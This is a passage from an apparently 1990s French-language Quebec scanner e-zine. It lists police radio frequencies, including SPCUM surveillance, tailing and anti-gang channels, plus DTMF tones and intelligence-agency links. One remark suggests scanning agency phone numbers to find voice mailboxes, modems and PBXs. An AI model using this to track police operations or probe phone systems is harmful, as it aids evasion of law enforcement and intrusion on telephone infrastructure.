    154.16000  XJG 461    100.0  NOTRE DAME DE LOURDES       POSTE DE POLICE DE JOLIETTE
    154.16000  XJG 461    100.0  NOTRE DAME DES PRAIRIES     POSTE DE POLICE DE JOLIETTE
    154.17500        ?           ODANAK
    140.11500  XJF 27     151.4  OTTAWA
    142.48500  XJF 27     151.4  OTTAWA
    142.72500  XJF 27     151.4  OTTAWA
    142.80000  (ONTARIO)      ?  OTTAWA
    139.92000  XJF 27     151.4  OTTAWA                      REU EN INVERSIONS (de temprature)
    141.09000  XJF 27     151.4  OTTAWA                      RECOIT EN INVERSIONS, BONS SIGNAUX
    142.09500  XJF 27     151.4  OTTAWA                      RECU EN INVERSIONS (DE TEMPRATURE)
    142.23000  XJF 27     151.4  OTTAWA                      RECU EN INVERSIONS (DE TEMPRATURE)
    411.68750  XJF 886    100.0  OTTERBURN PARK
    411.03750  XJF 886    100.0  OTTERBURN PARK              DATA TIM SANS CTCSS. VOIX AVEC CTCSS.
    154.83000  CFD 693    100.0  PIEDMONT                    NOUVEAU JAN 1997. 3 MUNICIPALITES.ANI
    154.05500  XJF 885           PIERREVILLE
    411.68750  XJF 545    151.4  PINCOURT
    410.58750  ?           94.8  PLESSISVILLE
    154.01000  XJK 283           POINTE BLEUE
    410.53750  XJP 743     77.0  POINTE CALUMET              861 BL CHAPELLE
    154.37000  XJF 602           PORT CARTIER
    154.37000  XJF 602           PORT CARTIER
    155.79000  VBQ 792           PORT DE QUEBEC              271 DE L'ESTUAIRE
    154.83000  CFD 693    100.0  PREVOST                     NOUVEAU JAN 1997. 3 MUNICIPALITES.ANI
    411.56250  XJF 847           PRINCEVILLE
    141.39000  (ONTARIO)  107.2  PROVINCE D'ONTARIO          OPP CANAL 1A
    141.19500  (ONTARIO)  107.2  PROVINCE D'ONTARIO          OPP CANAL 1B.RECOIT SOUVENT EN INVERSIONS
    141.30000  (ONTARIO)  107.2  PROVINCE D'ONTARIO          OPP CANAL 1C
    141.43500  (ONTARIO)  107.2  PROVINCE D'ONTARIO          OPP CANAL 2A
    141.69000  (ONTARIO)  107.2  PROVINCE D'ONTARIO          OPP CANAL 2B
    143.65500  (ONTARIO)  107.2  PROVINCE D'ONTARIO          OPP CANAL 2C
    141.63000  (ONTARIO)  107.2  PROVINCE D'ONTARIO          OPP CANAL 3A
    141.40500  (ONTARIO)  107.2  PROVINCE D'ONTARIO          OPP CANAL 3B
    141.70500  (ONTARIO)  107.2  PROVINCE D'ONTARIO          OPP CANAL 4A
    141.49500  (ONTARIO)  107.2  PROVINCE D'ONTARIO          OPP CANAL 4B
    141.36000  (ONTARIO)  107.2  PROVINCE D'ONTARIO          OPP CANAL 5A
    141.72000  (ONTARIO)  107.2  PROVINCE D'ONTARIO          OPP CANAL 5B
    141.45000  (ONTARIO)  107.2  PROVINCE D'ONTARIO          OPP CANAL 6A
    141.54000  (ONTARIO)  107.2  PROVINCE D'ONTARIO          OPP CANAL 6B
    141.55500  (ONTARIO)  107.2  PROVINCE D'ONTARIO          OPP CANAL 7A
    141.67500  (ONTARIO)  107.2  PROVINCE D'ONTARIO          OPP CANAL 7B
    142.36500  (ONTARIO)  107.2  PROVINCE D'ONTARIO          OPP CANAL 8A
    142.66500  (ONTARIO)  107.2  PROVINCE D'ONTARIO          OPP CANAL 8B
    143.10000  (ONTARIO)  107.2  PROVINCE D'ONTARIO          OPP CANAL 8C
    143.19000  (ONTARIO)  107.2  PROVINCE D'ONTARIO          OPP CANAL 9A
    143.64000  (ONTARIO)  107.2  PROVINCE D'ONTARIO          OPP CANAL 9B
    142.83000  (ONTARIO)  107.2  PROVINCE D'ONTARIO          OPP CANAL 9C
    142.77000  (ONTARIO)  107.2  PROVINCE D'ONTARIO          OPP COMMON CHANNEL.
    140.97000  (ONTARIO)  107.2  PROVINCE D'ONTARIO          OPP SIMPLEX CHANNEL
    153.80000  XJL 673           QUEBEC
    153.83000  XJK 901           QUEBEC
    154.10000  XJK 901           QUEBEC
    154.10000  XJF 96            QUEBEC
    154.19000  XJK 901           QUEBEC
    154.71000  XJF 96            QUEBEC
    154.71000  XJK 299    123.0  QUEBEC
    154.77000  XJF 96            QUEBEC
    154.77000  XJK 900           QUEBEC
    155.40000  XJF 96            QUEBEC
    155.40000  XJK 900           QUEBEC
    155.85000                    QUEBEC
    155.88000  XJK 900           QUEBEC
    155.88000  XJK 901           QUEBEC
    158.80000  XJF 96            QUEBEC
    154.19000  XJF 96            QUEBEC                      ANTI-EMEUTE SEULEMEMENT
    155.13000  XJK 299           QUEBEC                      ANTI-EMEUTE SEULEMENT.
    155.79000                    QUEBEC                      BANDE 1.
    155.79000  XJF 96     123.0  QUEBEC                      F-1 OPERATIONS GENERALES
    155.85000  XJF 96            QUEBEC                      F-2.
    155.58000  XJF 96            QUEBEC                      F-3.
    411.16250  XJF 96     123.0  QUEBEC                      LIEN COMPLEXE G ? RX SUR PLACE OU INTERMOD ?
    153.80000  XJK 902           QUEBEC (ILE D'ORLEANS)
    153.98000  XJK 902           QUEBEC (ILE D'ORLEANS)
    154.10000  XJK 902           QUEBEC (ILE D'ORLEANS)
    154.19000  XJK 902           QUEBEC (ILE D'ORLEANS)
    155.79000  XJK 902    123.0  QUEBEC (ILE D'ORLEANS)
    155.85000  XJK 902           QUEBEC (ILE D'ORLEANS)
    413.31250  XJF 588    151.4  REPENTIGNY
    413.51250  XJF 588    151.4  REPENTIGNY
    412.91250  XJF 588    151.4  REPENTIGNY                  ACI RX. AUSSI TIM A 0 CTCSS
    412.66250  ?                 REPENTIGNY                  DATA, TERMINAUX MOBILES.
    411.58750  ?          136.5  RICHELIEU
    411.63750  XJF 576    123.0  RIGAUD
    153.77000  XJF 321           RIMOUSKI
    154.68000  XJF 321           RIMOUSKI
    155.43000  XJF 321           RIMOUSKI
    153.87500  ?                 RIMOUSKI                    DE INFO MEDAQ. FREQUENCE ETRANGE ?
    159.33000  XJI 252           RIVIERE AU RENARD
    153.95000  XJF 260           RIVIERE DU LOUP
    411.52500  XJF 544           ROBERVAL
    418.27500  XJF 544           ROBERVAL
    159.21000  ?                 ROCHESTER NY                INTERSERVICE
    411.65000  XJI 278           ROCK FOREST
    412.56250  XJI 278           ROCK FOREST
    154.68000  XJH 222           ROCK ISLAND
    412.78750  XJJ 34     127.3  ROSEMERE
    154.04000  XJH 53            ROUYN-NORANDA               F1-DATA BURSTS/TONE AIGU/DVP SUR DEMANDE
    154.92000  XJH 53            ROUYN-NORANDA               F2 - CRPQ
    159.27000  XJF 361           SCHEFFERVILLE
    154.10000  XJK 28            SEPT ILES
    154.71000  XJK 28            SEPT ILES
    158.97000  ?                 SHAWINIGAN
    411.85000  ?          162.2  SHAWINIGAN SUD
    413.10000  ?                 SHAWINIGAN SUD
    411.85000  ?                 SHAWINIGAN SUD              TIM
    855.58750  XJF 44      TRK   SHERBROOKE                  SIMPLEX.
    856.03750  XJF 44      TRK   SHERBROOKE                  SIMPLEX.
    856.28750  XJF 44      TRK   SHERBROOKE                  SIMPLEX.
    856.53750  XJF 44      TRK   SHERBROOKE                  SIMPLEX.
    856.78750  XJF 44      TRK   SHERBROOKE                  SIMPLEX.
    855.56250  XJF 44      TRK   SHERBROOKE                  SIMPLEX. SWAT
    867.26250  XJF 44      TRK   SHERBROOKE                  TRUNKING EDACS
    866.26250  XJF 44      TRK   SHERBROOKE                  TRUNKING EDACS.
    866.23750  XJF 44      TRK   SHERBROOKE                  TRUNKING EDACS.
    866.48750  XJF 44      TRK   SHERBROOKE                  TRUNKING EDACS.
    866.53750  XJF 44      TRK   SHERBROOKE                  TRUNKING EDACS.
    866.76250  XJF 44      TRK   SHERBROOKE                  TRUNKING EDACS.
    866.78750  XJF 44      TRK   SHERBROOKE                  TRUNKING EDACS.
    867.03750  XJF 44      TRK   SHERBROOKE                  TRUNKING EDACS.
    867.06250  XJF 44      TRK   SHERBROOKE                  TRUNKING EDACS.
    867.28750  XJF 44      TRK   SHERBROOKE                  TRUNKING EDACS.
    866.73750  XJF 44      TRK   SHERBROOKE                  TRUNKING EDACS. ALLOUE MAIS PAS EN SRV ?
    155.97000  XJG 57            SILLERY                     VERIFIE INFO MEDAQ
    411.93750  XJH 30     103.5  SOREL
    413.43750  XJH 30     100.0  SOREL
    154.17500  XJI 284           ST ADOLPHE D'HOWARD
    154.20500  XJI 284    103.5  ST ADOLPHE D'HOWARD         ENCODAGE SSI ET ACI RX (800 HZ)
    411.58750  XJO 883     71.9  ST AMABLE                   POLICE DE STE JULIE
    154.16000  XJG 461    100.0  ST AMBROISE DE KILDARE      POSTE DE POLICE DE JOLIETTE
    151.29500  XJF 771    100.0  ST ANTOINE DES LAURENTIDES
    411.61250  XJF 945    100.0  ST BASILE LE GRAND          CW ID RX.SSI
    412.26250  XJK 937    114.8  ST BRUNO DE MONTARVILLE     ENCODAGE SSI (VSB) PERMANENT
    411.67500  XJJ 671    100.0  ST CESAIRE (VILLE)
    154.16000  XJG 461    100.0  ST CHARLES BOROMEE          POLICE JOLIETTE (450) 759-5222
    154.92000  VBN 344*          ST CHARLES BORROMEE         VOIR 154.160 POLICE JOLIETTE
    411.68750  XJL 635    123.0  ST CONSTANT
    412.56250  XJG 425    156.7  ST CONSTANT                 CANDIAC, DELSON, ST CONSTANT
    151.29500  XJF 895    127.3  ST DONAT (MONTCALM)         REPETEUR AU MT GARCEAU.AVEC INCENDIES ?.
    413.13750  XJG 494    123.0  ST EUSTACHE
    413.56250  XJN 667    123.0  ST EUSTACHE
    413.68750  XJN 667    123.0  ST EUSTACHE
    411.93750  XJN 667    123.0  ST EUSTACHE                 ENCODAGE SSI PERMANENT
    454.37500  [REF]      136.5  ST EUSTACHE                 TEMPORAIRE. SERVAIT LORS DE LA CRISE OKA
    154.65000  XJI 83            ST FELICIEN
    411.60000  XJF 291    114.8  ST GABRIEL (BERTHIER)
    154.92000  XJF 877           ST GEORGES DE BEAUCE
    158.97000  XJF 875           ST GEORGES OUEST
    411.16250  XJF 264    123.0  ST HUBERT/LEMOYNE          F1
    412.78750  XJF 264    123.0  ST HUBERT/LEMOYNE          F2 - CRPQ
    413.13750  XJF 264    123.0  ST HUBERT/LEMOYNE
    412.18750  XJF 73     100.0  ST HYACINTHE                BASE = CONTROLE
    411.98750  XJF 49     110.9  ST JEAN SUR RICHELIEU       F2 - POLICE DU HAUT RICHELIEU
    412.96250  XJF 49     110.9  ST JEAN SUR RICHELIEU       F1
    411.38750  XJF 37     118.8  ST JEROME
    151.29500  XJF 37     100.0  ST JEROME                   A REVOIR
    154.02500  XJF 293           ST JOVITE
    411.38750  XJF 51     123.0  ST LAMBERT                  TIM (PAS DE CTCSS) +VOIX (AVEC CTCSS)
    410.56250  XJA 260    114.8  ST LAZARE                   DANS TOUR D'UNITEL
    412.66250  VOR 492           ST LAZARE                   DANS TOUR D'UNITEL
    411.65000  VOR 492    114.8  ST LAZARE                   SECURITE POLICE (TOUR UNITEL)
    158.97000  ?                 ST LUC DE CHAMPLAIN
    410.86250  XJP 397    162.2  ST LUC SUR RICHELIEU
    413.36250  ?                 ST MICHEL
    154.16000  XJG 461    100.0  ST PAUL DE JOLIETTE         POLICE JOLIETTE
    154.16000  XJG 461    100.0  ST PIERRE DE JOLIETTE (VIL) POLICE JOLIETTE
    410.11250  ?                 ST RAYMOND
    411.71250  XJH 256    114.8  ST REMI DE NAPIERVILLE      SSI
    410.16250  XJF 721     91.5  ST SAUVEUR DES MONTS
    159.21000  XJF 80     100.0  ST THIMOTHE                 AUTRE RPT A 151.265 (PARALLELE)
    151.26500        ?    100.0  ST THIMOTHE                 NEW JUIL 99 EN // AVEC 159.210 RPT # 2
    154.16000  XJG 461    100.0  ST THOMAS DE JOLIETTE       POLICE JOLIETTE
    413.92500  XJF 814           ST TITE
    162.12000  ?          100.0  STE ADELE
    159.21000  XJG 35     103.5  STE AGATHE DES MONTS
    154.83000  CFD 693    100.0  STE ANNE DES LACS           NOUVEAU JAN 1997. 3 MUNICIPALITES.ANI
    411.88750  ?                 STE ANNE DES PLAINES
    413.31250  XJF 556    114.8  STE CATHERINE
    411.03750  XJF 556    114.8  STE CATHERINE               ENCODAGE SSI
    410.13750  XJG 91     162.2  STE FOY        F-1 OPERATIONS (VERIFIE PAR INFO-MEDAQ). CHANGE EDACS 866 MHZ
    411.11250  XJG 91*    162.2  STE FOY        F-2 BROUILLEUR NON PERMANENT (INFO MEDAQ PASSE SUR EDACS 866 MHZ + AEGIS )
    413.31250  XJG 91     162.2  STE FOY        F-3 SIMPLEX - PASSE AU EDACS +  AEGIS NUMRIQUE
    866.11250  XJG 91      TRK   STE FOY                     TRUNKING EDACS + ENCODAGE NUMRIQUE AEGIS PERM.
    866.21250  XJG 91      TRK   STE FOY                     TRUNKING EDACS + ENCODAGE NUMRIQUE AEGIS PERM.
    867.41250  XJG 91      TRK   STE FOY                     TRUNKING EDACS + ENCODAGE NUMRIQUE AEGIS PERM.
    866.46250  XJG 91      TRK   STE FOY                     TRUNKING EDACS + ENCODAGE NUMRIQUE AEGIS PERM.
    866.66250  XJG 91      TRK   STE FOY                     TRUNKING EDACS + ENCODAGE NUMRIQUE AEGIS PERM.
    411.58750  XJO 883     71.9  STE JULIE DE VERCHERES
    154.26500  XJG 432           STE MARIE DE BEAUCE
    411.68750  XJF 506           STE MARTHE SUR LE LAC
    154.16000  XJG 461    100.0  STE MELANIE                 POLICE JOLIETTE
    411.63750  XJF 330*          STE SOPHIE (TERREBONNE)     154.130.
    154.13000  XJF 330    114.8  STE SOPHIE (TERREBONNE)     SSI
    412.88750  XJF 74     127.3  STE THERESE
    156.03000  ?                 SUFFOLK COUNTY NY.          CAR TO CAR.
    411.65000  XJF 243           SUTTON
    410.86250  VOR 472    141.3  TERREBONNE
    411.48750  XJF 342    141.3  TERREBONNE
    411.88750  XJF 570    141.3  TERREBONNE
    419.12500  ?                 TERREBONNE                  LIENS VERS REPETEURS 412 MHZ
    414.13750  ?                 TERREBONNE (REMOTE)         LIENS VERS REPETEURS 412 MHZ.TX TOUJOURS ON.
    412.97500  ?                 THETFORD MINES
    154.92000  XJF 943           THURSO
    142.33500          ?  127.3  TORONTO ?                   RECU EN INVERSIONS (DE TEMPRATURE)
    411.71250  XJF 499    100.0  TRACY
    411.93750  XJF 499    103.5  TRACY
    413.01250  XJF 499    100.0  TRACY
    151.29500  XJF 499    123.0  TRACY                       REPETEUR MOBILE VERS 411/416.7125
    410.30000  XJF 410           TROIS RIVIERES
    410.67500  XJG 29      77.0  TROIS RIVIERES              RX SOUVENT EN INVERSIONS
    411.62500  ?           82.5  TROIS RIVIERES OUEST
    460.20000  KTB 231    118.8  TROY, VERMONT
    460.15000  KTB 231    118.8  TROY, VERMONT               ID RX VOCALEMENT. QTH A REVOIR
    411.68750  XJF 767           VAL BELAIR
    412.48750  XJF 767           VAL BELAIR
    411.13750  ?                 VAL BELAIR                  ENCODAGE (?) PERMANENT.DE INFO-MEDAQ.
    411.57500  ?                 VAL D'OR
    151.29500  XJF 895           VAL DAVID                   ST DONAT
    410.86250  ?          114.8  VALCOURT
    159.21000  XJF 80     100.0  VALLEYFIELD                 AUTRE RPT A 151.265 (PARALLELE)
    151.26500        ?    100.0  VALLEYFIELD                 NEW JUIL 99 EN // AVEC 159.210 RPT # 2
  **412.01250**XJK 37*****156.7**VANIER                      PLUS EN FONCTION - COUVERT PAR QUBEC
  **413.38750**XJK 37*****156.7**VANIER                      PLUS EN FONCTION - COUVERT PAR QUBEC
    412.11250  XJG 47     123.0  VARENNES                    AUSSI TERMINAUX (0 PL).MAINTENANT ENCODE SSI.
    411.65000  ?          103.5  VAUDREUIL
    412.31250  XJF 826    107.2  VAUDREUIL
    411.71250  XJF 826    107.2  VAUDREUIL-DORION
    412.66250  ?          118.8  VICTORIAVILLE
    164.10000  VAS 788*          WASKAGANISH
    411.62500  XJF 457    100.0  WATERLOO                    ENCODAGE SSI
    411.57500  XJH 240           WINDSOR
    460.03750  KSE 566    118.8  [?] [USA]                   REVOIR ID, PAS BON (QTH:TEXAS)
    155.46000  XJG 429    141.3  [NON LOCALISE]
    410.76250  ?           71.9  [NON LOCALISE]
    411.38750  ?          114.8  [NON LOCALISE]
    411.67500  ?          103.5  [NON LOCALISE]
    411.71250  ?          110.9  [NON LOCALISE]
    411.73750  ?          110.9  [NON LOCALISE]
    412.21250  ?          141.3  [NON LOCALISE]
    412.23750  ?          141.3  [NON LOCALISE]
    412.26250  ?          123.0  [NON LOCALISE]
    413.51250  ?          141.3  [NON LOCALISE]
    411.98750  ?                 [NON LOCALISE]              BURSTS DE DATA TERMINAUX MOBILES.
    154.92000      ?      103.5  [NON LOCALISE]              ENCODAGE SSI ET PP NR
    155.62500  ?                 [NON LOCALISE]              ENCODAGE SSI RPT OUT 0 PL
    412.38750  ?          141.3  [NON LOCALISE]              REVOIR CTCSS,PAS CERTAIN
    413.46250  ?                 [NON LOCALISE]              TIM - STE JULIE ?


NOTES : Lorsque je mentionne  quelques reprises 'Entendu ou RX en 
inversions' cela indique que j'ai reu cette station en inversions....de 
temprature (lorsqu'un front froid rencontre un chaud ou vice-versa. 
Cettecondition est favorable pour faire voyager les ondes VHF et UHF sur de 
grandes distances et peut durer de quelques minutes  plusieurs heures.) et 
ne s'applique pas au genre de modulation. SI un encodage de la voix est 
utilis, j'utilise plutt la mention 'SSI' ou 'encodage SSI'....



****************************************************************************


                          Frquences de la SQ
     Voici une liste de frquences connues utilis par ce service.


Classification par frquences

NOTE : Pour ce tableau, j'inclus quelques localisations  titre de rfrence 
seulement,  mais cela n'est pas complet car bien entendu ces frquences sont 
utilises un peu partout au Qubec...du moins pour les canaux 1  11.



   RPT      Mobiles  Canal Notes et dtails
    N/A     171.075    C   Mobiles  mobiles seulement (mobiles du G.I. seulement)
    N/A     171.180    A   Mobiles  mobiles seulement
    N/A     172.020    B   Mobiles  mobiles seulement
  152.510   157.770    16
  152.525   157.785    17
  152.540   157.800    18
  152.555   157.815    19
  153.650   155.100    22  Poste autoroutier Montral-Laval [M] (Montral-Mtro).
  153.920   155.040    25
  154.100   154.430    27
  154.220   155.520    20
  154.400
  154.565
  154.680   155.580    21  MRC Matawinie (Rawdon) [Q]
  154.740   155.850    23  Poste autoroutier Montral-Laval (Montral-Mtro)
  154.800   155.400    26  MRC Des Pays D'en Haut
  154.950   155.970    24
  155.655
  166.500   171.540    03
  166.620   171.810    07  tait cartier gnral
  166.635   171.795    12
  166.650   171.780    10  Cartier / Champlain (ponts)
  166.665   171.195    15
  166.680   171.210    06
  166.740   172.140    02
  166.800  171.360     01  Poste principal MRC Matawinie (Rawdon)
  166.815  171.495     13  MRC Montcalm [Q] (ex. poste Lachenaie)
  166.830  172.080     08  Poste autoroutier des Laurentides [M] / MRC Des Pays D'en Haut [M]
                           /Anciennement : Cowansville/Granby [S], St Jrme [H].
  167.010  172.200     09  Poste principal MRC Matawinie
  167.025  171.525     14  MRC de Lanaudire (Berthier et autoroutes)
  167.040  171.930     05  Poste principal MRC Matwawinie
  167.340  171.480     04  Anciennement : Valleyfield/Vaudreuil [K], autre [Q]
  167.535
  167.550
  167.700  171.510     11
  454.475  459.475     R1  Rpteur vhiculaire, basse puissance
  454.550  459.550     R2  Rpteur vhiculaire, basse puissance
  454.625  459.625     R3  Rpteur vhiculaire, basse puissance


                            Frquence de la SQ
                        Classification par CANAUX

                        Rpteur   Mobiles     Canal

                        166.800    171.360      01
                        166.740    172.140      02
                        166.500    171.540      03
                        167.340    171.480      04
                        167.040    171.930      05
                        166.680    171.210      06
                        166.620    171.810      07
                        166.830    172.080      08
                        167.010    172.200      09
                        166.650    171.780      10
                        167.700    171.510      11
                        166.635    171.795      12
                        166.815    171.495      13
                        167.025    171.525      14
                        166.665    171.195      15
                        152.510    157.770      16
                        152.525    157.785      17
                        152.540    157.800      18
                        152.555    157.815      19
                        154.220    155.520      20
                        154.680    155.580      21
                        153.650    155.100      22
                        154.740    155.850      23
                        154.950    155.970      24
                        153.920    155.040      25
                        154.800    155.400      26
                        154.100    154.430      27
                        171.075    171.075    28 / C
                        N/A        171.180      A
                        N/A        172.020      B
                        N/A        171.075      C
                        454.475    459.475      R1
                        454.550    459.550      R2
                        454.625    459.625      R3

*****************************************************************************

                        Frquences radio du SPCUM
     A noter que les canaux sont rpertoris et numrots en 6 banques :

1 - Canaux d'usage gnral
2 - Sections spcialises
3 - Groupe technique
4 - Surveillance
D - Donnes (les canaux de data)
R - Canaux de rserve

1-01 = 410.1125
1-02 = 410.2625 (auxiliaire)
1-03 = 410.3625
1-04 = 410.4875
1-05 = 410.6125
1-06 = 410.7875 (auxiliaire)
1-07 = 410.9125
1-08 = 410.6625 (utilise en simplex pour les suivis de personnes)
1-09 = 412.6875 (oprations spciales)
1-10 = 411.3125 (oprations spciales)
1-11 = 412.1375 (oprations spciales)
1-12 = 410.0125 (oprations spciales - lien tlphonique)

2-01 = 408.3125 Simplex - section d'intervention rgionale (OUEST)
2-02 = 408.6375 " " " " " + hlico.(CENTRE SUD/EST)
2-03 = 408.4125 Simplex - section d'intervention rgionale (NORD/EST)
2-04 = 408.2125 Simplex - Moralit
2-05 = 408.5125 Simplex - Vols qualifis
2-06 = 408.4375 Simplex - Fraudes et incendies criminels
2-07 = 408.5375 Simplex - Anti gang
2-08 = 408.1125 Simplex - Stupfiants

A noter que ces canaux, de la banque 2, sont gnralement encrypts en mode 
numrique. ..et qu'il est impossible de les dcoder. Si votre radio s'arrte 
sur l'une de ces frquences et que vous entendez que du bruit blanc (comme 
si le squelch etait ouvert) c'est qu'il s'agit d'une transmission encode 
numriquement.


3-01 = 413.6625 (Groupe technique/tactique)
3-02 = 413.6125 (Groupe technique)

Ces frquences sont aussi encodes numriquement la plupart du temps.

4-01 = 411.1875 Centre oprationnel (Brouill,rpteur n'est pas utilis prsentement)
4-02 = 418.2125 Surveillance physique (Brouill, simplex)
4-03 = 411.5375 Groupe tactique (sert rarement)
4-04 = 418.7375 Surveillance physique (Brouill, simplex)
4-05 = 418.7875 Surveillance physique (Brouill, simplex)
4-06 = 418.1875 Surveillance physique (Brouill, simplex)
4-07 = 418.2375 Surveillance physique (Brouill, simplex)

De nouveau, la plupart de ces frquences sont encodes numriquement.

D-1 = 410.0375
D-2 = 410.3375
D-3 = 410.8125
D-4 = 411.2125

Transmission de donnes pour les terminaux mobiles. Le standard n'est pas
connu de mme qu'il est impossible a dcoder...

Rserve

R-01 = 418.8625
R-02 = 410.5875
R-03 = 413.7375
R-04 = 413.7625 (vhicules vols)
R-05 = 418.1125
R-06 = 413.7875
R-07 = 413.2375

Divers :
Centre des mesures d'urgences de la CUM

411.2375

Plusieurs intervenants participent  ce service, dont la ville de Montral 
et les municipalits environnantes, ainsi que d'autre intervenants dont 
Urgences Sant, la Sret du Qubec, la STCUM, la police des ports 
nationaux,etc,etc.


Une vrification du systme radio se fait tout les mardis matin.

****************************************************************************



                 Frquences des tonalits de signalisation DTMF

                    ( DTMF - Dual Tone Multi Frequencies )

                        TOUCHE        F1 (Hz)    F2 (Hz)
                          1             1209      697
                          2             1336      697
                          3             1477      697
                          4             1209      770
                          5             1336      770
                          6             1477      770
                          7             1209      852
                          8             1336      852
                          9             1477      852
                          0             1336      941
                          *             1209      941
                          #             1477      941
                          A             1633      697
                          B             1633      770
                          C             1633      852
                          D             1633      941
                          DIAL TONE      350      440
                          BUSY SIGNAL    480      620
                          RINGING SIGNAL 440      480

****************************************************************************


-- A venir? --

- Plan pour filtre interfrence/intermodulation
- Plan de modification de tone
- Encore du stock de police et agence secrte :)
- Satellite
- D'Autre sorte d'antenne
- D'Autre ondes, juste pour vous...
- Interresting Web Site
- Dcouverte!
- Trucs Divers
- Vos question...?
- Et plus...

Greeting to: "Neuro" Pour l'article qu'il a trouver de VE2VGA
             et "VE2VGA" ...pour tout ce que j'ai pu trouver sur
             son site et mes Aussi mes livre: Haruteq Scanner Book
             dition Qubec et L'annuaires de frquence de la rgion
             de Qubec! Oh et la revue Net-Mag avec leur frquence            secrte
             qui viennent de VE2VGA que je n'aurais pu connatre sans eu :)


-- Conclu! --
Bon alors vous avez du voir que mon article est environ le quart de ce que 
Neuro a trouver mais ca drange pas l'intention etais la hehe! Non sans joke 
la prochaine fois je vais vous donnez un ou deux plan assurer car je crois 
que l'article etais assez gros et que de toute faon j'ai pas eu le temps de 
faire le .jpg du plan alors cela est remis a la prochaine fois. Alors 
j'espre que vous avez aimer et que vous allez m'envoyer vos questions et 
vos dcouverte pour les prochains mag...




-====================-
-= Services Secrets =-
-====================-
Bon ca y est les services secret sur Internet... Mouais ceci est tirer de la 
revue "Net-Mag" que j'avais perdu ouais! Bon eu y dise que c'est pas aussi 
secret que ca les services secret mais tk je commencerai pas a trop dire 
mais opinion malgr que vous devez comprendre que c'est pas dans le plus top 
secret ce qui est le plus secret n'est pas vraiment connecter au net malgr 
qu'un franais ou un belge je sais pu a trouver une liste de militaire et 
entk le gros kit sur un site mais finalement on en sais trop rien! Va 
falloir vrifier!

-- Les services secrets anglais --

http://www.mi5.gov.uk
Il existe au moins deux sites sur les Services Secrets anglais. L'un est le 
site officiel de MI5 (Services de Scurit). La plupart des documents sont 
au format PDF et ncessitent Acrobat Reader, d'Adobe. Il est trs facile de 
contacterdirectement par tlphone au: (0)171 930 9000 l'indicatif est le: 
(011 44) si vous avez des informations sur des terroristes, par exemple. 
L'autre site (non officiel) concerne le MI6:
http://www.five.org.uk/security/mi6org/mi6org.htm
Le MI6 est le "Secret Intelligence Service" Anglais (les espions) dont le 
directeur actuel est: David Spedding depuis septembre 1994.

-- Les services secrets US --
http://www.treas.gov/usss
Le site officiel des Services Secrets des tats-Unis (en anglais) donne 
beaucoup d'informations. Allez voir la galerie de photos. On y apprend 
comment dtecter la fausse monnaie, grce a de nombreuse photos dtailles 
des billets vert ... Alors avec ca vous allez pouvoir savoir quoi ne pas 
faire si vous faite de la fausse monnaie des US. 
http://www.treas.gov/usss/money_detect.htm
On y trouve aussi des offres d'emploi (pour citoyens amricains "filiales" 
dans chaque tat et a l'tranger, l'histoire des services secrets et leur 
directeur actuel: Brain L Stafford
http://www.treas.gov/usss/director.htm . Voir aussi le site de la CIA 
Central Intelligence Agency dirige par George J. Tenet: http://www.cia.gov 
et celui NSA: http://www.nsa.gov:8080


-- Les services secrets israliens --
http://www.chez.com/boigien/secret/israel/mossad/mossad.htm (site non 
officiel bien sur) On distingue l'Aman: Agaf Ha-Modi'in pour les renseignent 
militaire: le Lekem Lishkat Kshr Mada qui est le bureau des relations 
scientifiques: le MossadHa-Mossad L-Mofiin ou l Tafkidim Myouh'adim c'est 
l'institut de renseignement et des opration spciales (les espions) et dont 
le patron actuel est le Gnral Danny Yatom remplaant Shabta Shavit; le 
Shin Beth: Shrout Ha-Bitah'on Ha-Klali qui est le service de la scurit 
gnrale.


-- Les services secrets franais --
La aussi, il en existe plusieur: ceux qui dpendent secrtariat gnral de 
la dfense nationale comme la BRGE, Brigade de Renseignement et de Guerre 
lectronique ; la DGSE Direction Gnrale de la Scurit Extrieur (les 
espions) ex-SDECE, dont le directeur actuel est Jacques Dewatre ; la DPSD, 
Direction de la Protection et de la Scurit de la Dfense; la DRM, 
Direction du Renseignement Militaire et le SCSSI, Service Central de la 
Scurit des Systmes d'Information. Et ceux qui dpendent du ministre de 
l'intrieur: la DST Direction de la Surveillance du Territoire et les RG, 
Direction centrale Renseignement Generaux.Et ici le site non officiel de la 
DGSE.
http://dsge.citeweb.net/principale.shtml
Il y a des rsumes de quelques oprations(Rainbox warrior, "remplacement" de 
Bokassa par Dacko et quelque autres sabotages), les principaux sites: la  
"piscine" (caserne Mortier) "tristus-city",etc...

-- Les services secrets canadiens --
http://www.csis-scrs.gc.ca
Beaucoup de communication dans ce site du Service canadien du renseignement 
de scurit (SCIS). On y trouve les adresses de leurs bureaux. Le directeur 
actuel du SCIS est Ward Elcock.
Vous pouvez lire son communiquer: 
http://www.csis-scrs.gc.ca/fra/press/kellyf.html .
A voir aussi la GRC: http://www.spots.ab.ca/~fivestar/grc2.htm et pour la
liste des frquences secretes veiller vous referez a l'article de Scanner
D'ondes.


Bon alors peut-tre que certain cherchais certaine de ces adresses entk vous 
pourrez y faire ce que vous y voulez avec sans trop de connerie bien sur 
comme on le sais tous :)

Et je crois bien qu'il doit y avoir de bonne information dans quelques un de 
ces sites ou sinon en scannant un peu on devrais trouver mieux et en plus il 
y a des sites qui donnent les numro de tlphone alors on peut trs bien 
trouver des VMB, Modem, PaBX ,etc... alors chercher un peu et si j'ai le 
temps ma essayer de faire ca pour vous un moment
donner!

Alors pas trop de connerie

PaToFF(Pat-EtHiQ)


**********************************************************************
8-1 QUELQUES FREQUENCES D'ECOUTES (+ ou - lgales) by Cyberdollar
**********************************************************************

26,065  26,505 MHz CB (bande "A")
26,313  26,475 MHz tlphones sans fil agrs
26,515  26,955 MHz CB (bande "B")
26,965  27.405 MHz CB (bande "C", seule autorise en France)
27,415  27,855 MHz CB (bande "D")
27,865  27,985 MHz CB (bande "E")
28,000  29,700 MHz trafic amateur (bande des "10 mtres") 
29,700  30,525 MHz usage militaire
30.525  32.125 MHz rseaux privs
32.125  32.500 MHz usage militaire
33.000  34.850 MHz usage militaire
34.850  36.200 MHz rseaux privs
35.400  39.200 MHZ microphone "sans fil"
36.200 0 39.000 MHz usage militaire
37.500  38.250 MHz radio-astronomie
39.400  40.600 MHz rseaux privs
40.600  41.000 MHz usage militaire
41.000  41.200 MHz radiocommande
41.255 MHz tlcommande 
41.312  41.475 MHz tlphones sans fils agrs
41.500  50.200 MHz usage militaire et tlphone sans fil non agrs
50.200  51.200 MHz trafic amateur
51.200  60.000 MHz usage militaire
55.750  63.750 MHz tlvision (bande I)
60.000  68.000 MHz rseaux privs
